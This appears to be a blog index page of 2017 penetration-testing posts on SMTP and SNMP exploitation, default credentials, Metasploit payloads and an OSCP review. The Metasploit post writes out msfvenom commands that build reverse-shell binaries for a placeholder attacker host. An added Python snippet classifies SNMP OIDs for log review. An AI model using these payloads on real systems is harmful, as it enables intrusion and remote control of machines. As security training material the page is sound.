
Tuesday, 11 April 2017

Exploiting Software Based Vulnerabilities : Attacking Network - Pentesting Network




Vulnerabilities on a particular machine can be software or hardware based. Today we will see how software-based vulnerabilities can be exploited to take over a target machine.


Software-based vulnerabilities are nothing but a coding/programming error that exists in a particular software version or series, which can be compromised using a piece of malicious code called an "exploit".


First we identified an SMTP service on our target machine 192.168.131.137:

SLmail smtpd 5.5.0 4433 is running on port 25


Monday, 10 April 2017

Hacking SNMP Service Part 2 - The Post Exploitation : Attacking Network - Network Pentesting




In our previous post we identified the community strings via an Nmap scan and by brute forcing the community string values.

Now we will see how those extracted community strings can be used for post exploitation.

To do this we will use the various tools mentioned below.

What is a MIB in SNMP

The SNMP Management Information Base (MIB) is a database containing information usually related to network management. The database is organized like a tree, where branches represent different organizations or network functions. The leaves of the tree (final endpoints) correspond to specific variable values that can then be accessed, and probed, by an external user. To read more about the MIB tree, refer to the following


For example, the following MIB values correspond to specific Microsoft Windows SNMP parameters.

1.3.6.1.2.1.25.1.6.0      System Processes
1.3.6.1.2.1.25.4.2.1.2    Running Programs
1.3.6.1.2.1.25.4.2.1.4    Processes Path
1.3.6.1.2.1.25.2.3.1.4    Storage Units
1.3.6.1.2.1.25.6.3.1.2    Software Name
1.3.6.1.4.1.77.1.2.25     User Accounts
1.3.6.1.2.1.6.13.1.3      TCP LocalPorts
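The tree structure described above is what makes an OID readable: every value an SNMP client asks for sits under one of these branches. The following is an added example (not code from the original post) that builds a small tree from the Windows OIDs listed above and, given the OIDs seen in a constructed sample of SNMP requests, reports which categories of host data a reader of the community string actually pulled. The sample queries and the helper names are assumptions for illustration.

```python
# Added example: classify queried SNMP OIDs by walking a MIB tree built from
# the Windows OID prefixes listed in the post. Useful when reviewing snmpd or
# firewall logs to see what categories of host data a community-string read
# exposed. OID prefixes below are the ones quoted in the post.
WINDOWS_MIB = {
    "1.3.6.1.2.1.25.1.6.0": "System Processes",
    "1.3.6.1.2.1.25.4.2.1.2": "Running Programs",
    "1.3.6.1.2.1.25.4.2.1.4": "Processes Path",
    "1.3.6.1.2.1.25.2.3.1.4": "Storage Units",
    "1.3.6.1.2.1.25.6.3.1.2": "Software Name",
    "1.3.6.1.4.1.77.1.2.25": "User Accounts",
    "1.3.6.1.2.1.6.13.1.3": "TCP LocalPorts",
}

# Constructed sample of OIDs seen in requests (hypothetical, not from the post).
SAMPLE_QUERIES = [
    "1.3.6.1.2.1.25.4.2.1.2.1408",   # an instance under Running Programs
    "1.3.6.1.2.1.25.4.2.1.2.2216",   # another Running Programs instance
    "1.3.6.1.4.1.77.1.2.25.1.1.5",   # an instance under User Accounts
    "1.3.6.1.2.1.1.5.0",             # sysName: not in the table above
]


def build_tree(oid_names):
    """Build a nested dict tree; a node with '_name' is a labelled branch."""
    root = {}
    for oid, name in oid_names.items():
        node = root
        for arc in oid.split("."):
            node = node.setdefault(arc, {})
        node["_name"] = name
    return root


def classify(tree, oid):
    """Return the deepest labelled branch that covers oid, or None."""
    node, label = tree, None
    for arc in oid.split("."):
        node = node.get(arc)
        if node is None:
            break              # walked past the known part of the tree
        label = node.get("_name", label)
    return label


def summarise_queries(oids, oid_names=WINDOWS_MIB):
    """Count how many queried OIDs fall under each MIB category."""
    tree = build_tree(oid_names)
    counts = {}
    for oid in oids:
        category = classify(tree, oid) or "unknown"
        counts[category] = counts.get(category, 0) + 1
    return counts
```

Running summarise_queries(SAMPLE_QUERIES) groups the two process-table reads under "Running Programs", the account enumeration under "User Accounts", and leaves sysName as "unknown" because it is outside the listed branches.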


Sunday, 9 April 2017

Default Credentials Vulnerability : Attacking Network - Network Pentesting






Hello reader, we have talked a lot about web hacking, and today I decided to blog some interesting things about Attacking Network - Network Pentesting.

For your information, for demonstration purposes I am using a Vyatta VM, which you can also download from http://packages.vyos.net/iso/release/1.1.7/

Today we will see a common vulnerability that many admins create by keeping the default configuration, or, put another way, keeping the default credentials.

So we have a target machine on 192.168.131.135 and our attacking machine on 192.168.131.134.

Let's do an Nmap service scan on our target machine.

nmap -sV 192.168.131.135 



So we got some information: ports 22, 23, 80 and 443 are open.
Of these, 22 and 23 look interesting for us, since it is quite possible that the credentials for those services are still the defaults.

Generating Metasploit Payloads : Creating Metasploit Reverse Shell





Below are the different types of Metasploit payloads we can use to get a reverse shell from the victim machine.

These payloads are selected in Metasploit with set payload "payloadname"; before that we have to set up a multi handler, which is configured with use exploit/multi/handler.

The payloads mentioned require certain inputs as options, such as LHOST and LPORT.


Operating System Based Binary Shells


Linux

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=attackerip LPORT=attackerport -f elf > shell.elf

Windows

msfvenom -p windows/meterpreter/reverse_tcp LHOST=attackerip LPORT=attackerport -f exe > shell.exe

Mac

msfvenom -p osx/x86/shell_reverse_tcp LHOST=attackerip LPORT=attackerport -f macho > shell.macho

Web Payloads : Usually For RFI, SQL Injection

Wednesday, 5 April 2017

Penetration Testing with Kali Linux OSCP Review and Course, Lab experience — My OSCP Review :Try Harder! ;)



Introduction:
Gaining the OSCP certification is a challenge like no other. After my experience with the OSCP exam course from Offensive Security, I decided to go ahead and write an OSCP review. I registered for this course in July 2015 and chose the 90-day lab. Within a week I received mail from Offensive Security regarding VPN access, course material, etc.
OSCP is a combination of network, system and web hacking, with a moderate part of exploit writing, where you have to write an exploit for a particular vulnerable software.
Who am I:
For those who don't know me, my name is Narendra Bhati, working at Suma Soft Pvt. Ltd. as a Security Analyst. I have 3+ years of experience in application VAPT. I am also a bug bounty hunter and have been doing it for the last 3 years. Yes, lots of money ;) apart from salary.
About The OSCP Course: